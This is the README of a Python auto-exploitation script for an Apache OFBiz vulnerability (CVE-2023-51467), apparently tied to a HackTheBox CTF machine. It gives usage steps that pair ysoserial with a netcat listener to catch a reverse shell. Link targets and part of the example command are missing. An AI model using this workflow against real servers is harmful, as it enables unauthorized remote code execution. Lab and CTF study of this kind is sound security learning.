# BadBizness
Automatic exploitation script for the Java web framework [OF Biz]( under CVE-2023-51467. Inspired by the HackTheBox machine [Bizness](

## Usage and Example
This script requires the tool [ysoserial]( and OpenJDK version 11. See usage menu for installation.

Setup a listener to catch the shell with your preferred method. Here is a netcat example:
nc -nlvp 1337
Execute the script:
python3 [path to ysoserial-all.jar] [TARGET BASE URL] [LISTENER IP] [LISTENER PORT]

python3 /home/twopoint/ysoserial-all.jar 1337
## Disclaimer and Credit
This tool was meant as a way to learn more about Python. I credit [this]( script for helping me thoroughly.